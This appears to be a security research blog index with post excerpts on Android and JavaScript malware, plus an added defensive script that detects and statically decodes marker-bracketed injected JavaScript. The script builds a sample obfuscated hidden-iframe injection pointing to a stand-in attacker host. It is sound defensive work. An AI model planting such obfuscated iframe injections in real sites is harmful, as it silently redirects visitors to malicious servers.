A recent article by the Italian IT company TG Soft brought to light an Android malware sample that is being served from the official Google Play Store. According to Google Play statistics, the application was installed on 10,000-50,000 devices. The malware presents itself in the Play Store as an application called 'Real Basketball'. Once installed, however, it is designed to confuse the user by its appearance: it shows up in the phone's main menu as the 'Google Play Store' application itself. [Figure: phone's main menu after installation of the malware] One of the Play... [Read More]
by Ruchna Nigam  |  Jan 22, 2014  |  Filed in: Security Research
Mysterious, yet familiar. Over the past couple of months there has been a noticeable increase in heavily obfuscated JavaScript code that embeds malicious iframes. Most of that code was injected into JavaScript files included by compromised websites (rather than into the home page itself), which is presumably harder for the site's admin to spot. An example of such injected JavaScript code looks like this: Note that the comments surrounding the obfuscated code (/d47c75/ and //d47c75/ in this case) serve as an injection marker for an... [Read More]
by Patrick Yu  |  Oct 01, 2013  |  Filed in: Security Research
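The post above describes two things an analyst can key on: a block of obfuscated code bracketed by a repeated comment marker, and the obfuscation itself (character-code arrays written into the page). The following is an added example, not code from the post: a small static triage routine that finds marker-bracketed blocks in a JavaScript file, scores them with obfuscation indicators, and decodes String.fromCharCode() payloads without executing anything. The sample file is constructed here (it reuses the post's tag d47c75 as the marker; the /*tag*/ spelling, the benign helper and the hostname are assumptions).

```javascript
// Added example (not code from the original post): static triage of a JavaScript
// file for a marker-bracketed, obfuscated injected block. The sample file, the
// marker spellings other than those quoted in the post, and the hostname are
// constructed for this example.

const INJECTED_PAYLOAD =
  '<iframe src="http://evil.example/in.php" width=1 height=1></iframe>';

// Produce the document.write(String.fromCharCode(...)) form injectors commonly use.
// Used here only to build the constructed sample, so the decoder's output is known.
function obfuscateAsCharCodes(text) {
  const codes = Array.from(text, (ch) => ch.charCodeAt(0)).join(',');
  return `document.write(String.fromCharCode(${codes}));`;
}

// Constructed sample: a benign-looking library file with one injected block
// bracketed by a comment marker, as the post describes.
const SAMPLE_JS = [
  '/* jQuery-like helper (constructed, benign) */',
  'function $(id){return document.getElementById(id);}',
  '/*d47c75*/' + obfuscateAsCharCodes(INJECTED_PAYLOAD) + '//d47c75/',
  'window.onload=function(){};',
].join('\n');

// A marker is a comment-like token carrying a short hex tag, in any of the
// spellings /*tag*/, //tag/ or /tag/ (the post quotes the last two).
const MARKER_RE = /\/\/?\*?\s*([0-9a-f]{6,8})\s*\*?\/?/g;

// Return the text between each pair of identical markers.
function findMarkedBlocks(src) {
  const hits = Array.from(src.matchAll(MARKER_RE), (m) => ({
    tag: m[1], start: m.index, end: m.index + m[0].length,
  }));
  const blocks = [];
  const used = new Set();
  for (let i = 0; i < hits.length; i++) {
    if (used.has(i)) continue;
    for (let j = i + 1; j < hits.length; j++) {
      if (!used.has(j) && hits[j].tag === hits[i].tag) {
        blocks.push({ tag: hits[i].tag, body: src.slice(hits[i].end, hits[j].start) });
        used.add(i);
        used.add(j);
        break;
      }
    }
  }
  return blocks;
}

// Cheap indicators that a block is obfuscated or writes content into the page.
const INDICATORS = [
  ['fromCharCode', /String\.fromCharCode\s*\(/],
  ['unescape', /\bunescape\s*\(/],
  ['eval', /\beval\s*\(/],
  ['document.write', /document\.write(ln)?\s*\(/],
  ['long numeric list', /(?:\d{1,3}\s*,\s*){20,}/],
];

function obfuscationIndicators(body) {
  return INDICATORS.filter(([, re]) => re.test(body)).map(([name]) => name);
}

// Statically decode String.fromCharCode(n, n, ...) calls; nothing is executed.
function decodeCharCodeCalls(body) {
  return Array.from(
    body.matchAll(/String\.fromCharCode\s*\(\s*([\d\s,]+)\)/g),
    (m) => m[1].split(',').map((n) => String.fromCharCode(Number(n.trim()))).join(''),
  );
}

// One report entry per marker-bracketed block.
function triage(src) {
  return findMarkedBlocks(src).map((b) => {
    const decoded = decodeCharCodeCalls(b.body);
    return {
      tag: b.tag,
      indicators: obfuscationIndicators(b.body),
      decoded,
      hasIframe: decoded.some((s) => /<iframe\b/i.test(s)),
    };
  });
}

// Stand-alone run: print the verdict for the constructed sample.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(triage(SAMPLE_JS), null, 2));
}
```

The marker search is deliberately loose (any comment-like token carrying a short hex tag), so on a real site it should be run over every included script and the results reviewed by hand; the decoder only handles the plain fromCharCode form, and anything wrapped in eval() or unescape() still needs a sandboxed run or a manual pass.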
In a post last week regarding the new 'hack' against Mega, MegaPWN, we talked about the implementation of a GreaseMonkey script to avoid being a victim of a hack on Mega servers. The script would mainly look for changes in the "crypto-magic" performing JavaScripts loaded from Mega. I decided to give it a try and wrote a TamperMonkey script (the Chrome equivalent of GreaseMonkey) called MEGACheck that runs every time a user visits Mega, and performs the aforementioned integrity check. What Is TamperMonkey (TM)? Tampermonkey is a free browser... [Read More]
by Ruchna Nigam  |  Sep 11, 2013  |  Filed in: Security Research
I had always wanted to look into Firefox OS. It's done. I created my first application. What kind of application does a reverse engineer write as a first app? A CrackMe, of course. You can try it: the sources are available here. But, honestly, it is really a very (very) simple CrackMe, as my real goal was to get acquainted with Firefox OS and understand the possible risks in terms of malware. We, anti-virus analysts, won't need disassemblers or decompilers for Firefox OS malware. That's cool, isn't it (although part of the mystery of our job is... [Read More]
by Axelle Apvrille  |  Jul 30, 2012  |  Filed in: Security Research
Recently, we stumbled upon a strange JavaScript file; at first sight, it looked like a totally legitimate, clean file. The file name is jquery.js and it has all the characteristics of a proper jQuery file. Even the header was kept: /* * jQuery JavaScript Library v1.3.1 * * * Copyright (c) 2009 John Resig * Dual licensed under the MIT and GPL licenses. * * * Date: 2009-01-21 20:42:16 -0500 (Wed, 21 Jan 2009) * Revision: 6158 */ jQuery is a popular JavaScript library used, as said on the homepage, ( [Read More]
by David Maciejak  |  Apr 30, 2009  |  Filed in: Security Research
While malicious servers hosting "drive-by-install" scripts are continuously evolving, their goal remains the same: to silently drop and run malicious files on the victim's computer. The flaws exploited by those Web Attack Toolkits have been much the same for a while, so what's new in the "malscripts" world? As we pointed out in a previous post, writers of malicious web-based exploits worked out some advanced obfuscation methods to hide their malicious scripts from detection. It seems that this trend is dying down and being replaced by a simpler yet effective... [Read More]
by David Maciejak  |  Mar 04, 2009  |  Filed in: Security Research
Legitimate -- and sometimes renowned -- web sites are more and more subject to code-injection attacks; and it is not rare today to find your everyday site injected with malicious JavaScript code whose sole purpose is to silently redirect all visitors to malicious servers "behind the scenes." What happens on those servers is called a "drive-by-install" in the jargon, and results in malicious executable files being (again) silently pushed to and run on the victim's computer. Details of the drive-by-install process, while interesting, are out of the... [Read More]
by David Maciejak  |  Feb 25, 2009  |  Filed in: Security Research